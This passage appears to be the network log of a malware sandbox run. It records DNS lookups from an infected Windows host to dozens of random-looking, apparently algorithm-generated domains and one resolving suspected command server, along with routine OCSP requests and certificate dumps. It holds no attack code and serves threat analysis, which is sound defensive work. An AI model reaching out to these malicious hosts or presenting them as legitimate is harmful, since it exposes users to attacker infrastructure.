Jul 4, 2018 14:05:40.230839968 CEST192.168.0.608.8.8.80xefb9Standard query (0)wigermexir.comA (IP address)IN (0x0001)
Jul 4, 2018 14:05:41.975562096 CEST192.168.0.608.8.8.80x4438Standard query (0)ocsp.int-x3.letsencrypt.orgA (IP address)IN (0x0001)
Jul 4, 2018 14:05:42.262593985 CEST192.168.0.608.8.8.80x9c88Standard query (0)nvxij5qutl.netA (IP address)IN (0x0001)
Jul 4, 2018 14:05:47.267944098 CEST192.168.0.608.8.8.80x122fStandard query (0)rmqgc5frw3.comA (IP address)IN (0x0001)
Jul 4, 2018 14:05:52.312407017 CEST192.168.0.608.8.8.80x1caaStandard query (0)zqvdnvokoq.netA (IP address)IN (0x0001)
Jul 4, 2018 14:05:57.360927105 CEST192.168.0.608.8.8.80x6bc4Standard query (0)pmtz1iirvr.comA (IP address)IN (0x0001)
Jul 4, 2018 14:06:02.339490891 CEST192.168.0.608.8.8.80x2e26Standard query (0)tdgku3qbl1r.netA (IP address)IN (0x0001)
Jul 4, 2018 14:06:07.446363926 CEST192.168.0.608.8.8.80x5b4bStandard query (0)ktchyigkk2iwi3.comA (IP address)IN (0x0001)
Jul 4, 2018 14:06:12.509696007 CEST192.168.0.608.8.8.80x28a7Standard query (0)gdelzlc224n5q9.netA (IP address)IN (0x0001)
Jul 4, 2018 14:06:17.473352909 CEST192.168.0.608.8.8.80xcfd9Standard query (0)s4v3xhn3swcbmbc.comA (IP address)IN (0x0001)
Jul 4, 2018 14:06:22.512562037 CEST192.168.0.608.8.8.80x50dcStandard query (0)phyrnfojfwiyuz.netA (IP address)IN (0x0001)
Jul 4, 2018 14:06:27.564419985 CEST192.168.0.608.8.8.80xe852Standard query (0)hdylvm3db3ixvi.comA (IP address)IN (0x0001)
Jul 4, 2018 14:06:32.555356979 CEST192.168.0.608.8.8.80x7418Standard query (0)e45cukuntbcou.netA (IP address)IN (0x0001)
Jul 4, 2018 14:06:37.566991091 CEST192.168.0.608.8.8.80x9b7fStandard query (0)r5hfff2lnn9mn.comA (IP address)IN (0x0001)
Jul 4, 2018 14:06:42.662039995 CEST192.168.0.608.8.8.80x5455Standard query (0)titz9qqc5szt.netA (IP address)IN (0x0001)
Jul 4, 2018 14:06:47.588325977 CEST192.168.0.608.8.8.80xbad2Standard query (0)fcs1fscxh2oa.comA (IP address)IN (0x0001)
Jul 4, 2018 14:06:52.593498945 CEST192.168.0.608.8.8.80xba2dStandard query (0)gj2pexhfy95v.netA (IP address)IN (0x0001)
Jul 4, 2018 14:06:57.642504930 CEST192.168.0.608.8.8.80x3a64Standard query (0)hp1sofo5bnc.comA (IP address)IN (0x0001)
Jul 4, 2018 14:07:02.648781061 CEST192.168.0.608.8.8.80xbb7bStandard query (0)tmmq5lcauha.netA (IP address)IN (0x0001)
Jul 4, 2018 14:07:07.652491093 CEST192.168.0.608.8.8.80xc25cStandard query (0)hvzaduc42t2o.comA (IP address)IN (0x0001)
Jul 4, 2018 14:07:12.720355034 CEST192.168.0.608.8.8.80x3924Standard query (0)gvyn4bo2n3qq.netA (IP address)IN (0x0001)
Jul 4, 2018 14:07:17.682972908 CEST192.168.0.608.8.8.80x3eb3Standard query (0)hs1agojraguo.comA (IP address)IN (0x0001)
Jul 4, 2018 14:07:22.702013969 CEST192.168.0.608.8.8.80xcb92Standard query (0)erz5yxeblneu.netA (IP address)IN (0x0001)
Jul 4, 2018 14:07:27.755734921 CEST192.168.0.608.8.8.80x16a4Standard query (0)zo4q11gk3iyjgw.comA (IP address)IN (0x0001)
Jul 4, 2018 14:07:32.736481905 CEST192.168.0.608.8.8.80xbc61Standard query (0)5v95xlfdzrj1de.netA (IP address)IN (0x0001)
Jul 4, 2018 14:07:37.729584932 CEST192.168.0.608.8.8.80x3f5Standard query (0)4yony3itl9losv.comA (IP address)IN (0x0001)
Jul 4, 2018 14:07:38.727833986 CEST192.168.0.608.8.8.80x3f5Standard query (0)4yony3itl9losv.comA (IP address)IN (0x0001)
Jul 4, 2018 14:07:42.817245960 CEST192.168.0.608.8.8.80x9ebeStandard query (0)tyou23hsrm.netA (IP address)IN (0x0001)
Jul 4, 2018 14:07:47.789988995 CEST192.168.0.608.8.8.80x543aStandard query (0)j4rjf2dtjl.comA (IP address)IN (0x0001)
Jul 4, 2018 14:07:52.800857067 CEST192.168.0.608.8.8.80xa687Standard query (0)n5k2ekq2ro.netA (IP address)IN (0x0001)
Jul 4, 2018 14:07:57.857134104 CEST192.168.0.608.8.8.80x3eb0Standard query (0)jdf2xx9wetn.comA (IP address)IN (0x0001)
Jul 4, 2018 14:08:02.837874889 CEST192.168.0.608.8.8.80xfb2fStandard query (0)5julzwwlbkrgvm.netA (IP address)IN (0x0001)
Jul 4, 2018 14:08:07.840035915 CEST192.168.0.608.8.8.80x7fdfStandard query (0)b1l41m3rggg5nz.comA (IP address)IN (0x0001)
Jul 4, 2018 14:08:12.922791958 CEST192.168.0.608.8.8.80x5362Standard query (0)cwug3djg3reoa9.netA (IP address)IN (0x0001)
Jul 4, 2018 14:08:17.827440977 CEST192.168.0.608.8.8.80x8a87Standard query (0)ushy2wtgwvny.comA (IP address)IN (0x0001)

DNS Answers

TimestampSource IPDest IPTrans IDReplay CodeNameCNameAddressTypeClass
Jul 4, 2018 14:05:39.374761105 CEST8.8.8.8192.168.0.600x8f18No error (0)www.google.com216.58.210.4A (IP address)IN (0x0001)
Jul 4, 2018 14:05:39.668544054 CEST8.8.8.8192.168.0.600x990aNo error (0)ocsp.pki.googwww3.l.google.comCNAME (Canonical name)IN (0x0001)
Jul 4, 2018 14:05:39.668544054 CEST8.8.8.8192.168.0.600x990aNo error (0)www3.l.google.com216.58.210.14A (IP address)IN (0x0001)
Jul 4, 2018 14:05:40.546510935 CEST8.8.8.8192.168.0.600xefb9No error (0)wigermexir.com212.92.98.68A (IP address)IN (0x0001)
Jul 4, 2018 14:05:41.898453951 CEST8.8.8.8192.168.0.600xef33No error (0)a279.dscq.akamai.net23.10.249.146A (IP address)IN (0x0001)
Jul 4, 2018 14:05:41.898453951 CEST8.8.8.8192.168.0.600xef33No error (0)a279.dscq.akamai.net23.10.249.168A (IP address)IN (0x0001)
Jul 4, 2018 14:05:42.005597115 CEST8.8.8.8192.168.0.600x4438No error (0)ocsp.int-x3.letsencrypt.orgocsp.int-x3.letsencrypt.org.edgesuite.netCNAME (Canonical name)IN (0x0001)
Jul 4, 2018 14:05:42.005597115 CEST8.8.8.8192.168.0.600x4438No error (0)a771.dscq.akamai.net23.10.249.152A (IP address)IN (0x0001)
Jul 4, 2018 14:05:42.005597115 CEST8.8.8.8192.168.0.600x4438No error (0)a771.dscq.akamai.net23.10.249.171A (IP address)IN (0x0001)
Jul 4, 2018 14:05:42.288446903 CEST8.8.8.8192.168.0.600x9c88Name error (3)nvxij5qutl.netnonenoneA (IP address)IN (0x0001)
Jul 4, 2018 14:05:47.297177076 CEST8.8.8.8192.168.0.600x122fName error (3)rmqgc5frw3.comnonenoneA (IP address)IN (0x0001)
Jul 4, 2018 14:05:52.338326931 CEST8.8.8.8192.168.0.600x1caaName error (3)zqvdnvokoq.netnonenoneA (IP address)IN (0x0001)
Jul 4, 2018 14:05:57.386904001 CEST8.8.8.8192.168.0.600x6bc4Name error (3)pmtz1iirvr.comnonenoneA (IP address)IN (0x0001)
Jul 4, 2018 14:06:02.364025116 CEST8.8.8.8192.168.0.600x2e26Name error (3)tdgku3qbl1r.netnonenoneA (IP address)IN (0x0001)
Jul 4, 2018 14:06:07.470928907 CEST8.8.8.8192.168.0.600x5b4bName error (3)ktchyigkk2iwi3.comnonenoneA (IP address)IN (0x0001)
Jul 4, 2018 14:06:12.534456968 CEST8.8.8.8192.168.0.600x28a7Name error (3)gdelzlc224n5q9.netnonenoneA (IP address)IN (0x0001)
Jul 4, 2018 14:06:17.499186993 CEST8.8.8.8192.168.0.600xcfd9Name error (3)s4v3xhn3swcbmbc.comnonenoneA (IP address)IN (0x0001)
Jul 4, 2018 14:06:22.540262938 CEST8.8.8.8192.168.0.600x50dcName error (3)phyrnfojfwiyuz.netnonenoneA (IP address)IN (0x0001)
Jul 4, 2018 14:06:27.590655088 CEST8.8.8.8192.168.0.600xe852Name error (3)hdylvm3db3ixvi.comnonenoneA (IP address)IN (0x0001)
Jul 4, 2018 14:06:32.582084894 CEST8.8.8.8192.168.0.600x7418Name error (3)e45cukuntbcou.netnonenoneA (IP address)IN (0x0001)
Jul 4, 2018 14:06:37.607074976 CEST8.8.8.8192.168.0.600x9b7fName error (3)r5hfff2lnn9mn.comnonenoneA (IP address)IN (0x0001)
Jul 4, 2018 14:06:39.895287991 CEST8.8.8.8192.168.0.600x97f3No error (0)ctldl.windowsupdate.nsatc.netctldl.windowsupdate.com.edgesuite.netCNAME (Canonical name)IN (0x0001)
Jul 4, 2018 14:06:39.895287991 CEST8.8.8.8192.168.0.600x97f3No error (0)a1621.g.akamai.net23.10.249.34A (IP address)IN (0x0001)
Jul 4, 2018 14:06:39.895287991 CEST8.8.8.8192.168.0.600x97f3No error (0)a1621.g.akamai.net23.10.249.19A (IP address)IN (0x0001)
Jul 4, 2018 14:06:42.690570116 CEST8.8.8.8192.168.0.600x5455Name error (3)titz9qqc5szt.netnonenoneA (IP address)IN (0x0001)
Jul 4, 2018 14:06:47.613600016 CEST8.8.8.8192.168.0.600xbad2Name error (3)fcs1fscxh2oa.comnonenoneA (IP address)IN (0x0001)
Jul 4, 2018 14:06:52.622417927 CEST8.8.8.8192.168.0.600xba2dName error (3)gj2pexhfy95v.netnonenoneA (IP address)IN (0x0001)
Jul 4, 2018 14:06:57.680715084 CEST8.8.8.8192.168.0.600x3a64Name error (3)hp1sofo5bnc.comnonenoneA (IP address)IN (0x0001)
Jul 4, 2018 14:07:02.677544117 CEST8.8.8.8192.168.0.600xbb7bName error (3)tmmq5lcauha.netnonenoneA (IP address)IN (0x0001)
Jul 4, 2018 14:07:07.680706978 CEST8.8.8.8192.168.0.600xc25cName error (3)hvzaduc42t2o.comnonenoneA (IP address)IN (0x0001)
Jul 4, 2018 14:07:12.745070934 CEST8.8.8.8192.168.0.600x3924Name error (3)gvyn4bo2n3qq.netnonenoneA (IP address)IN (0x0001)
Jul 4, 2018 14:07:17.707748890 CEST8.8.8.8192.168.0.600x3eb3Name error (3)hs1agojraguo.comnonenoneA (IP address)IN (0x0001)
Jul 4, 2018 14:07:22.729052067 CEST8.8.8.8192.168.0.600xcb92Name error (3)erz5yxeblneu.netnonenoneA (IP address)IN (0x0001)
Jul 4, 2018 14:07:27.783169985 CEST8.8.8.8192.168.0.600x16a4Name error (3)zo4q11gk3iyjgw.comnonenoneA (IP address)IN (0x0001)
Jul 4, 2018 14:07:32.762871027 CEST8.8.8.8192.168.0.600xbc61Name error (3)5v95xlfdzrj1de.netnonenoneA (IP address)IN (0x0001)
Jul 4, 2018 14:07:38.752954006 CEST8.8.8.8192.168.0.600x3f5Name error (3)4yony3itl9losv.comnonenoneA (IP address)IN (0x0001)
Jul 4, 2018 14:07:42.844554901 CEST8.8.8.8192.168.0.600x9ebeName error (3)tyou23hsrm.netnonenoneA (IP address)IN (0x0001)
Jul 4, 2018 14:07:47.815148115 CEST8.8.8.8192.168.0.600x543aName error (3)j4rjf2dtjl.comnonenoneA (IP address)IN (0x0001)
Jul 4, 2018 14:07:52.829034090 CEST8.8.8.8192.168.0.600xa687Name error (3)n5k2ekq2ro.netnonenoneA (IP address)IN (0x0001)
Jul 4, 2018 14:07:57.882422924 CEST8.8.8.8192.168.0.600x3eb0Name error (3)jdf2xx9wetn.comnonenoneA (IP address)IN (0x0001)
Jul 4, 2018 14:08:02.862816095 CEST8.8.8.8192.168.0.600xfb2fName error (3)5julzwwlbkrgvm.netnonenoneA (IP address)IN (0x0001)
Jul 4, 2018 14:08:07.880552053 CEST8.8.8.8192.168.0.600x7fdfName error (3)b1l41m3rggg5nz.comnonenoneA (IP address)IN (0x0001)
Jul 4, 2018 14:08:12.948163033 CEST8.8.8.8192.168.0.600x5362Name error (3)cwug3djg3reoa9.netnonenoneA (IP address)IN (0x0001)
Jul 4, 2018 14:08:17.852802038 CEST8.8.8.8192.168.0.600x8a87Name error (3)ushy2wtgwvny.comnonenoneA (IP address)IN (0x0001)

HTTP Request Dependency Graph

  • ocsp.pki.goog
  • ocsp.int-x3.letsencrypt.org

HTTP Packets

Session IDSource IPSource PortDestination IPDestination PortProcess
0192.168.0.6049685216.58.210.1480C:\Windows\explorer.exe
TimestampkBytes transferredDirectionData
Jul 4, 2018 14:05:39.680968046 CEST4OUTGET /gsr2/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBTgXIsxbvr2lBkPpoIEVRE6gHlCnAQUm%2BIHV2ccHsBqBt5ZtJot39wZhi4CDQHjqTAc%2FHIGOD%2BaUx0%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: ocsp.pki.goog
Jul 4, 2018 14:05:39.691977978 CEST4INHTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 04 Jul 2018 12:04:58 GMT
Server: ocsp_responder
Content-Length: 468
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Cache-Control: public, max-age=86400
Age: 41
Data Raw: 30 82 01 d0 0a 01 00 a0 82 01 c9 30 82 01 c5 06 09 2b 06 01 05 05 07 30 01 01 04 82 01 b6 30 82 01 b2 30 81 9b a2 16 04 14 9b e2 07 57 67 1c 1e c0 6a 06 de 59 b4 9a 2d df dc 19 86 2e 18 0f 32 30 31 38 30 36 30 35 30 39 31 31 30 30 5a 30 70 30 6e 30 46 30 09 06 05 2b 0e 03 02 1a 05 00 04 14 e0 5c 8b 31 6e fa f6 94 19 0f a6 82 04 55 11 3a 80 79 42 9c 04 14 9b e2 07 57 67 1c 1e c0 6a 06 de 59 b4 9a 2d df dc 19 86 2e 02 0d 01 e3 a9 30 1c fc 72 06 38 3f 9a 53 1d 80 00 18 0f 32 30 31 38 30 36 30 35 30 30 30 30 30 30 5a a0 11 18 0f 32 30 31 39 30 36 30 35 30 30 30 30 30 30 5a 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 03 82 01 01 00 2a db ba 53 8e 0d 94 13 6d 24 f8 4a 1d 3f bd 89 6f 2f a9 41 f2 18 24 b3 2a 77 c1 e1 a3 d3 b0 61 cc f0 90 36 41 67 9d 84 c5 66 43 ef 65 50 96 35 78 a3 2c a2 ba 6a df 05 be ef d8 b4 33 cb 8b 2b f1 21 26 57 e2 6b ba e9 b4 5d 06 65 e4 19 f0 95 b7 da bc ed 96 fd 2d 9f fb 5a f4 c6 c4 e1 bc 46 34 6e dc 1a 0c ef a6 f0 a2 9e 0a be fe fc 67 53 df 64 81 60 1b d0 5e 72 30 8b de d4 0e dc 22 ee 8b 1f 39 8d b0 80 d9 b7 81 be fb d4 88 d9 47 4c 76 75 5a 66 c9 ac 40 3a d8 a0 67 d0 c8 ec fe e7 43 2d af c7 88 c1 e2 2a 50 99 d0 0c db e4 c1 83 f0 07 b4 3d 26 8c 34 4c 61 c9 3f 92 1d b3 26 48 09 0d ec 6f 93 c0 68 38 57 38 83 c1 12 d7 1a 77 bf cf 20 8b 71 83 55 32 07 33 8f e2 71 68 6c ef 13 b8 b1 43 dd 5a e0 54 38 1d 12 93 2e c7 f6 23 11 74 a3 b2 f8 9e fb 70 23 e4 bd 7a 41 6d ab ed
Data Ascii: 00+000WgjY-.20180605091100Z0p0n0F0+\1nU:yBWgjY-.0r8?S20180605000000Z20190605000000Z0*H*Sm$J?o/A$*wa6AgfCeP5x,j3+!&Wk]e-ZF4ngSd`^r0"9GLvuZf@:gC-*P=&4La?&Hoh8W8w qU23qhlCZT8.#tp#zAm
Jul 4, 2018 14:05:39.769212008 CEST5OUTGET /GTSGIAG3/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCCCIrzM%2FKFFw%2B HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: ocsp.pki.goog
Jul 4, 2018 14:05:39.780742884 CEST6INHTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Tue, 03 Jul 2018 13:51:44 GMT
Server: ocsp_responder
Content-Length: 463
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Cache-Control: public, max-age=86400
Age: 80035
Data Raw: 30 82 01 cb 0a 01 00 a0 82 01 c4 30 82 01 c0 06 09 2b 06 01 05 05 07 30 01 01 04 82 01 b1 30 82 01 ad 30 81 96 a2 16 04 14 77 c2 b8 50 9a 67 76 76 b1 2d c2 86 d0 83 a0 7e a6 7e ba 4b 18 0f 32 30 31 38 30 37 30 33 30 38 30 31 35 39 5a 30 6b 30 69 30 41 30 09 06 05 2b 0e 03 02 1a 05 00 04 14 f6 ed b0 63 62 32 81 9a 35 f6 8d 75 a0 9d 02 4a 11 aa 6c ad 04 14 77 c2 b8 50 9a 67 76 76 b1 2d c2 86 d0 83 a0 7e a6 7e ba 4b 02 08 22 2b cc cf ca 14 5c 3e 80 00 18 0f 32 30 31 38 30 37 30 33 30 38 30 31 35 39 5a a0 11 18 0f 32 30 31 38 30 37 31 30 30 38 30 31 35 39 5a 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 03 82 01 01 00 a2 da 41 86 e4 23 b7 fd e9 30 b7 28 7f 38 dc ec 15 ff 57 cb 77 c6 dd 92 83 e5 bb 7a 15 0b c7 4f 9d bb 2a c6 a6 22 2a 87 63 81 55 03 be 53 b7 75 dd 45 61 eb e0 c7 6f d2 b6 fa a7 49 e3 5a 58 86 93 aa d2 4c b2 78 59 20 48 21 e5 e5 0a fe 8d d2 5f 37 c1 94 eb 43 5a 4a d0 10 30 75 cc 93 e0 93 3e f5 a4 47 a7 3e 88 4d 25 b4 9e 52 55 fe 7c 6d 1b 0e 4f 26 76 9b fc d3 29 6e 91 d9 12 33 22 07 95 60 ee 28 84 73 f4 c4 16 65 e9 e7 b9 47 93 b9 eb 79 b6 c7 2b 1a f7 fc a6 91 6c 52 dc b1 3b 2e da c5 ba ad 88 59 2d 8c 9b ba 30 70 8e 33 98 99 25 8d 51 96 f9 f7 8c 5f ed ca 3a 41 d8 cc be 58 c5 77 10 94 ee bf 8e f9 35 30 ab f0 cd b0 36 6e 4e 74 84 c9 2a f0 6e 65 38 dc dd be cc e5 fc a6 2e 6c 8b 7a 95 8e 6b b0 99 45 6f d9 c2 30 41 f0 ac fe b7 f0 ec d9 e0 f6 dc 26 03 3c b2 1a 36 d4
Data Ascii: 00+000wPgvv-~~K20180703080159Z0k0i0A0+cb25uJlwPgvv-~~K"+\>20180703080159Z20180710080159Z0*HA#0(8WwzO*"*cUSuEaoIZXLxY H!_7CZJ0u>G>M%RU|mO&v)n3"`(seGy+lR;.Y-0p3%Q_:AXw506nNt*ne8.lzkEo0A&<6


Session IDSource IPSource PortDestination IPDestination PortProcess
1192.168.0.604968923.10.249.15280C:\Windows\explorer.exe
TimestampkBytes transferredDirectionData
Jul 4, 2018 14:05:42.016604900 CEST136OUTGET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBR%2B5mrncpqz%2FPiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7%2FOo7KECEgO54qVnGaYpxjBEoQUm57uvQQ%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: ocsp.int-x3.letsencrypt.org
Jul 4, 2018 14:05:42.213829994 CEST138INHTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 527
ETag: "5972FAB7F0C32338924510B0E1DB743D94E9B7AB7044372CF564AAE88431BEFD"
Last-Modified: Wed, 04 Jul 2018 11:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=43200
Expires: Thu, 05 Jul 2018 00:05:42 GMT
Date: Wed, 04 Jul 2018 12:05:42 GMT
Connection: keep-alive
Data Raw: 30 82 02 0b 0a 01 00 a0 82 02 04 30 82 02 00 06 09 2b 06 01 05 05 07 30 01 01 04 82 01 f1 30 82 01 ed 30 81 d6 a1 4c 30 4a 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 16 30 14 06 03 55 04 0a 13 0d 4c 65 74 27 73 20 45 6e 63 72 79 70 74 31 23 30 21 06 03 55 04 03 13 1a 4c 65 74 27 73 20 45 6e 63 72 79 70 74 20 41 75 74 68 6f 72 69 74 79 20 58 33 18 0f 32 30 31 38 30 37 30 34 31 31 30 38 30 30 5a 30 75 30 73 30 4b 30 09 06 05 2b 0e 03 02 1a 05 00 04 14 7e e6 6a e7 72 9a b3 fc f8 a2 20 64 6c 16 a1 2d 60 71 08 5d 04 14 a8 4a 6a 63 04 7d dd ba e6 d1 39 b7 a6 45 65 ef f3 a8 ec a1 02 12 03 b9 e2 a5 67 19 a6 29 c6 30 44 a1 05 26 e7 bb af 41 80 00 18 0f 32 30 31 38 30 37 30 34 31 31 30 30 30 30 5a a0 11 18 0f 32 30 31 38 30 37 31 31 31 31 30 30 30 30 5a 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 03 82 01 01 00 45 04 7d d4 36 cd 9c 48 2e f6 69 a2 47 13 93 1f 2c e3 96 04 cf 62 4f 9a f4 dc 21 f9 02 ff 15 07 ad 07 30 c1 0b 16 e0 47 14 28 9a 8a 8d 31 ff e5 39 59 85 62 fc 4c 38 e0 15 5c b9 f9 e1 76 94 93 d2 7a 2e 4d 7c d7 fe db 57 10 5e b0 6d 00 c6 bd 01 01 c9 a0 69 ed 20 0b a7 0c 54 9c 7c f5 94 c7 bc 9c d9 55 ef 04 a0 c9 89 ed 11 4f c4 a2 7f d7 c2 3b 5b bd 2a 62 6f 14 72 02 87 85 ef fa ba fb b8 74 fd 80 61 e2 bf 8c f2 e0 e2 06 f3 00 b3 31 64 db 4b 34 6f 9a 8e e2 99 c7 4b 95 eb 40 01 3f 8b bc ef ba c6 d8 be 85 0a 45 f4 5b e7 f6 a2 2b 13 fb 34 e1 59 29 d1 65 82 e8 e9 e5 bc 1f 82 a4 79 55 ed d3 b6 8d ca 6a b5 c5 dd 09 8b 3d a8 cc dc a9 fc 3d 73 06 f2 77 71 39 0e 87 d9 5a e7 fd 5e bf 8c 9f f3 08 66 89 1f 86 76 33 31 41 59 84 1b c2 a3 76 ca 06 22 a0 1a 7b 14 13 31 2b ab bb
Data Ascii: 00+000L0J10UUS10ULet's Encrypt1#0!ULet's Encrypt Authority X320180704110800Z0u0s0K0+~jr dl-`q]Jjc}9Eeg)0D&A20180704110000Z20180711110000Z0*HE}6H.iG,bO!0G(19YbL8\vz.M|W^mi T|UO;[*borta1dK4oK@?E[+4Y)eyUj==swq9Z^fv31AYv"{1+


HTTPS Packets

TimestampSource PortDest PortSource IPDest IPSubjectIssuerNot BeforeNot AfterRaw
Jul 4, 2018 14:05:39.479382038 CEST44349684216.58.210.4192.168.0.60CN=www.google.com, O=Google LLC, L=Mountain View, ST=California, C=USCN=Google Internet Authority G3, O=Google Trust Services, C=USTue Jun 19 13:38:49 CEST 2018Tue Aug 28 13:31:00 CEST 2018[[ Version: V3 Subject: CN=www.google.com, O=Google LLC, L=Mountain View, ST=California, C=US Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: SunPKCS11-NSS EC public key, 256 bits (id 13, session object) public x coord: 57486287385224518456871688099024216208249057546110480213910519166558515302284 public y coord: 56004012548390228849921375250734136449999619089009845961286545179598583415443 parameters: secp256r1 [NIST P-256, X9.62 prime256v1] (1.2.840.10045.3.1.7) Validity: [From: Tue Jun 19 13:38:49 CEST 2018, To: Tue Aug 28 13:31:00 CEST 2018] Issuer: CN=Google Internet Authority G3, O=Google Trust Services, C=US SerialNumber: [ 222bcccf ca145c3e]Certificate Extensions: 9[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: caIssuers accessLocation: URIName: http://pki.goog/gsr2/GTSGIAG3.crt, accessMethod: ocsp accessLocation: URIName: http://ocsp.pki.goog/GTSGIAG3]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: 77 C2 B8 50 9A 67 76 76 B1 2D C2 86 D0 83 A0 7E w..P.gvv.-......0010: A6 7E BA 4B ...K]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:false PathLen: undefined][4]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://crl.pki.goog/GTSGIAG3.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [1.3.6.1.4.1.11129.2.5.3][] ] [CertificatePolicyId: [2.23.140.1.2.2][] ]][6]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth][7]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature][8]: ObjectId: 2.5.29.17 Criticality=falseSubjectAlternativeName [ DNSName: www.google.com][9]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: F3 F3 10 A6 AC E0 83 D6 54 8E 79 5A E5 13 36 83 ........T.yZ..6.0010: 78 EC 52 85 x.R.]]] Algorithm: [SHA256withRSA] Signature:0000: 97 4D D6 9E 12 B6 5B 79 49 46 72 57 0A 22 28 4D .M....[yIFrW."(M0010: 2C 79 97 36 B2 C7 3D AA 55 6F 73 5F E9 89 69 C3 ,y.6..=.Uos_..i.0020: C5 4A 21 47 E0 15 75 41 87 1B DC 9C A6 AD B1 CF .J!G..uA........0030: 0B 29 FA DE A3 E0 AD B2 F2 79 FB 7A 74 64 A8 DE .).......y.ztd..0040: 27 8F F2 F5 FE 30 02 8C 17 6C 99 56 FB 75 0F 1A '....0...l.V.u..0050: 62 BE 56 02 1A 0C 65 1B 27 36 5A FC DC 78 53 1A b.V...e.'6Z..xS.0060: 34 F4 F1 EB 2D 89 01 82 79 80 34 2A 32 33 E8 08 4...-...y.4*23..0070: 84 45 8C FF 81 CD A2 86 A4 45 87 83 2A 58 8C 77 .E.......E..*X.w0080: C5 3A 03 FC EB 09 37 FF 7E D7 55 6A A7 1E F0 81 .:....7...Uj....0090: CF C8 EA C9 A3 CA B3 58 48 CE 69 E6 76 CF 23 01 .......XH.i.v.#.00A0: EF E5 04 04 59 D8 D8 24 FA 20 42 A3 D8 9B 16 5A ....Y..$. B....Z00B0: D7 53 DB 08 F5 4B 87 D9 3E 0D 0C 90 A4 3A D8 CC .S...K..>....:..00C0: B1 30 2D 50 91 66 DC DD C0 B5 B5 16 F6 DF 8E 4A .0-P.f.........J00D0: 02 CF C3 B0 9F 55 8E 68 2B 42 93 7A 66 52 C7 9F .....U.h+B.zfR..00E0: CE 00 9E 38 A6 C1 27 AC 9A 0B 77 15 B9 A6 19 1A ...8..'...w.....00F0: 01 CB A3 BF 94 43 14 40 8B 12 38 44 56 F1 5B BC .....C.@..8DV.[.]
Jul 4, 2018 14:05:39.479382038 CEST44349684216.58.210.4192.168.0.60CN=Google Internet Authority G3, O=Google Trust Services, C=USCN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Thu Jun 15 02:00:42 CEST 2017Wed Dec 15 01:00:42 CET 2021[[ Version: V3 Subject: CN=Google Internet Authority G3, O=Google Trust Services, C=US Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: Sun RSA public key, 2048 bits modulus: 25540719540096549801967532215622388028057340978592080609141732382164154646816296526083121741669679112385237833865384918487699354232562775118368146858293595735927525741548199921580705526790385577846106238921439103492392479618335857028746954930496648766472236039621875919970487709839673576509420299423776077274146396625683921324935984297937024355312712214769839608906726548857225274820644855735385444361318783494335259738982362137265282486277074790515499222682891121616563234042637263891559249011361734853144492241992433528066411156317991355405830410464673595997849166914573354017491657353926030969623191808378512203827 public exponent: 65537 Validity: [From: Thu Jun 15 02:00:42 CEST 2017, To: Wed Dec 15 01:00:42 CET 2021] Issuer: CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2 SerialNumber: [ 01e3a930 1cfc7206 383f9a53 1d]Certificate Extensions: 8[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: ocsp accessLocation: URIName: http://ocsp.pki.goog/gsr2]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: 9B E2 07 57 67 1C 1E C0 6A 06 DE 59 B4 9A 2D DF ...Wg...j..Y..-.0010: DC 19 86 2E ....]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:true PathLen:0][4]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://crl.pki.goog/gsr2/gsr2.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [2.23.140.1.2.2][PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.1 qualifier: 0000: 16 1C 68 74 74 70 73 3A 2F 2F 70 6B 69 2E 67 6F ..https://pki.go0010: 6F 67 2F 72 65 70 6F 73 69 74 6F 72 79 2F og/repository/]] ]][6]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth clientAuth][7]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature Key_CertSign Crl_Sign][8]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 77 C2 B8 50 9A 67 76 76 B1 2D C2 86 D0 83 